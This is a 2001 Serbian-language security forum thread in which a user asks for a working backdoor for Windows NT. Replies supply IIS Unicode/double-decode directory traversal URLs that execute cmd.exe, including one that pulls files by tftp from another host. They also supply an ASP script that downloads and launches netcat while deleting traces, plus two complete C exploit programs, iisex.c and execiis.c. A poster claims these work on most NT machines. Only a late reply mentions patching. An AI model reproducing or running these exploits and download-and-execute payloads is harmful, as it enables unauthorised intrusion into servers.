Srodne teme
15.06.2001. Polikita!
24.07.2004. backdoor
02.07.2003. BackDoor.SubSeven.21(Trojan)
17.02.2003. inventivnost spamera...
14.09.2003. BackDoors
06.02.2004. F-Prot i brisanje backdoor-a
21.06.2004. Backdoor.IRC.Zapchast
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Backdoor za NT 4/5

[es] :: Security :: Backdoor za NT 4/5

[ Pregleda: 4920 | Odgovora: 9 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

sv3ta

Član broj: 143
Poruke: 62
*.verat.net



Profil

icon Backdoor za NT 4/510.05.2001. u 01:32 - pre 250 meseci
Hello
Treba mi neki (bilo kakav samo da sljaka) backdoor za win NT 4/5 ...

imam i jedno pitanje ... kad sam u command line-u, kako da fetchem file sa nekog drugog servera ? preko ftp-a ne moze, postoji li neka druga komanda ?

BTW. Mrzim NT !!!!!!!!!!!!!!!!


Svt3a
 
Odgovor na temu

sv3ta

Član broj: 143
Poruke: 62
*.verat.net



Profil

icon Re: Backdoor za NT 4/510.05.2001. u 02:03 - pre 250 meseci
Vidim da NT ima i rcp ;)

kako ide komanda za rcp ??
example :
rcp -b 123.123.123.123 .user:blah /dir/to/file.exe ??

Svt3a
 
Odgovor na temu

etaoin

Član broj: 155
Poruke: 37
*.209.EUnet.yu



Profil

icon Re: Backdoor za NT 4/510.05.2001. u 08:49 - pre 250 meseci
šta bi ti bio backdoor?

uvek ima način da uđeš ako znaš odgovarajući pass. samo još treba da ga saznaš.

1. l0phtcrack uz NTFSDOS ili neki sniffer
2. passware windows 2000/NT key
3. neki sniffer
4. da pritegneš administratora
5. da mu stojiš iza ramena dok ovaj polako ukucava pass
6. da vidiš oko monitora da nije negde zapisan

etaoin shrdlu
 
Odgovor na temu

m r v a

Član broj: 8
Poruke: 1843
*.eunet.yu



Profil

icon Re: Backdoor za NT 4/508.06.2001. u 10:44 - pre 249 meseci
Citat:
sv3ta je napisao:
Hello
Treba mi neki (bilo kakav samo da sljaka) backdoor za win NT 4/5 ...


koliko god to izgledalo lame ....
al' NEtBus radi na NT4 ......
 
Odgovor na temu

stinger
Luka Gerzic
DELTA M, IT Department
DELTA M HQ

Član broj: 126
Poruke: 1099
*.drenik.net

ICQ: 57419599
Sajt: www.gerzic.net


Profil

icon Re: Backdoor za NT 4/508.06.2001. u 13:59 - pre 249 meseci
sveto probaj sa ovim igrackama :

NT 4.0 + IIS 3.0 + SP6a

http://www.example.com/scripts....%252f..%252fwinnt/system32/cm
d.exe?/c+dir+c:\



----



http://192.168.0.1/msadc/..%25....%255c../winnt/system32/cmd.ex
e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp

then i ran http://192.168.0.1/f.asp

following is a copy of the f.asp:


----------cut here-------------------------
<%
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe
c:\inetpub\scripts\nc0.exe")
tf.WriteLine("if not exist ncx99.exe goto startDL")
tf.WriteLine("start /w nc0.exe")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
command = server.mappath("dl.bat") & " " & dmax
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>



---------



http://www.knelo.com/~aramos/perl/iisrules.tgz

$ gzip -dc iisrules.tgz | tar -xvf -
iisrules.exe
iisrules.pl



----------


^^^--------- iisex.c starts here-------^^^^

/* IISEX by HuXfLuX <[email protected]>. IIS CGI File Decode Bug
exploit. Written 16-05-2001.
Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's
products were always
famous for their backward compatibility!

You can change the SHOWSEQUENCE value to some other strings that also
work.
More info: http://www.nsfocus.com

Thanx to Filip Maertens <[email protected]>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

#define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"

int resolv(char *hostname,struct in_addr *addr);

int main(int argc, char *argv[])
{

struct sockaddr_in sin;
struct in_addr victim;
char recvbuffer[1], stuff[200]="";
int create_socket;

printf("IISEX by HuxFlux <[email protected]>\nThis exploits
the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and
5!.\n");

if (argc < 3)
{
printf("[?] Usage: %s [ip] [command]\n", argv[0]);
exit(0);
}

if (!resolv(argv[1],&victim))
{
printf("[x] Error resolving host.\n");
exit(-1);
}
printf("\n[S] Exploit procedure beginning.\n");

if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf("[*] Socket created.\n");

bzero(&sin,sizeof(sin));
memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr));
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
//sin.sin_addr.s_addr = inet_addr(argv[1]);


if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf("[*] Connection made.\n");
else {
printf("[x] No connection.\n");
exit(1);
}

strcat(stuff, "GET ");
strcat(stuff, SHOWSEQUENCE);
strcat(stuff, argv[2]);
strcat(stuff, " HTTP/1.0\r\n\r\n");
printf("[*] Sending: %s", stuff);

memset(recvbuffer, '\0',sizeof(recvbuffer));

send(create_socket, stuff, sizeof(stuff), 0);

if ( strstr(recvbuffer,"404") == NULL ) {
printf("[*] Command output:\n\n");

while(recv(create_socket, recvbuffer, 1, 0) > 0)
{
printf("%c", recvbuffer[0]);
}
printf("\n\n");
}
else printf("[x] Wrong command processing. \n");
printf("[E] Finished.\n");

close(create_socket);
}

int resolv(char *hostname,struct in_addr *addr)
{
struct hostent *res;

if (inet_aton(hostname,addr)) return(1);

res = gethostbyname(hostname);
if (res == NULL) return(0);

memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
return(1);
}
^^^--------- iisex.c ends here-------^^^^



ako ti jos ovakvih bude trebalo javi... svi su na istu semu ... u principu svi rade, testirali smo ih ovde na drenik-u .. :)
 
Odgovor na temu

stinger
Luka Gerzic
DELTA M, IT Department
DELTA M HQ

Član broj: 126
Poruke: 1099
*.drenik.net

ICQ: 57419599
Sajt: www.gerzic.net


Profil

icon Re: Backdoor za NT 4/508.06.2001. u 14:00 - pre 249 meseci
evo i ovaj... :)



/*
*
* execiis.c - (c)copyright Filip Maertens
* BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error
*
* DISCLAIMER: This is proof of concept code. This means, this
code
* may only be used on approved systems in order to test the
availability
* and integrity of machines during a legal penetration test. In no
way
* is the author of this exploit responsible for the use and result
of
* this code.
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>


/* Modify this value to whichever sequence you want.
*
* %255c = %%35c = %%35%63 = %25%35%63 = /
*
*/

#define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+"



int main(int argc, char *argv[])
{

struct sockaddr_in sin;
char recvbuffer[1], stuff[200];
int create_socket;

printf("iisexec.c | Microsoft IIS CGI Filename Decode Error |
<[email protected]>\n-------------------------------------------------------------------------\n");

if (argc < 3)
{
printf(" -- Usage: iisexec [ip] [command]\n");
exit(0);
}


if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf(" -- Socket created.\n");

sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr(argv[1]);

if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf(" -- Connection made.\n");
else
{ printf(" -- No connection.\n"); exit(1); }


strcat(stuff, "GET ");
strcat(stuff, SHOWSEQUENCE);
strcat(stuff, argv[2]);
strcat(stuff, " HTTP/1.0\n\n");

memset(recvbuffer, '\0',sizeof(recvbuffer));

send(create_socket, stuff, sizeof(stuff), 0);
recv(create_socket, recvbuffer, sizeof (recvbuffer),0);



if ( ( strstr(recvbuffer,"404") == NULL ) )

printf(" -- Command output:\n\n");
while(recv(create_socket, recvbuffer, 1, 0) > 0)
{
printf("%c", recvbuffer[0]);
}

else
printf(" -- Wrong command processing. \n");

close(create_socket);

}

 
Odgovor na temu

stinger
Luka Gerzic
DELTA M, IT Department
DELTA M HQ

Član broj: 126
Poruke: 1099
*.drenik.net

ICQ: 57419599
Sajt: www.gerzic.net


Profil

icon Re: Backdoor za NT 4/508.06.2001. u 14:00 - pre 249 meseci
nisu backdoor-ovi ali ti daju access na masinu svaki put kad ti zatreba ... :)
 
Odgovor na temu

m r v a

Član broj: 8
Poruke: 1843
*.yubc.net



Profil

icon Re: Backdoor za NT 4/508.06.2001. u 19:55 - pre 249 meseci
samo jedno pitanjce .....jel' su isprobani ovi trickovi ???
 
Odgovor na temu

stinger
Luka Gerzic
DELTA M, IT Department
DELTA M HQ

Član broj: 126
Poruke: 1099
*.drenik.net

ICQ: 57419599
Sajt: www.gerzic.net


Profil

icon Re: Backdoor za NT 4/510.06.2001. u 13:03 - pre 249 meseci
naravno.. ako zelis log.. mogu da ti posaljem, inace radi na 70% NT-a u svetu ... naravno sad je vecina zakrpljena.. ali uvek se nadje.. :) ako zelis log ko sto rekoh... nije problem :)
 
Odgovor na temu

Shadowed
Vojvodina

Član broj: 649
Poruke: 12812



+4742 Profil

icon Re: Backdoor za NT 4/508.09.2005. u 18:21 - pre 197 meseci
Inace, Unicode bug se neutralise instaliranjem odgovarajuceg patch-a ili SP-a.
(cisto da usaglasim temu sa pravilnikom ).
 
Odgovor na temu

[es] :: Security :: Backdoor za NT 4/5

[ Pregleda: 4920 | Odgovora: 9 ] > FB > Twit

Postavi temu Odgovori

Srodne teme
15.06.2001. Polikita!
24.07.2004. backdoor
02.07.2003. BackDoor.SubSeven.21(Trojan)
17.02.2003. inventivnost spamera...
14.09.2003. BackDoors
06.02.2004. F-Prot i brisanje backdoor-a
21.06.2004. Backdoor.IRC.Zapchast
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.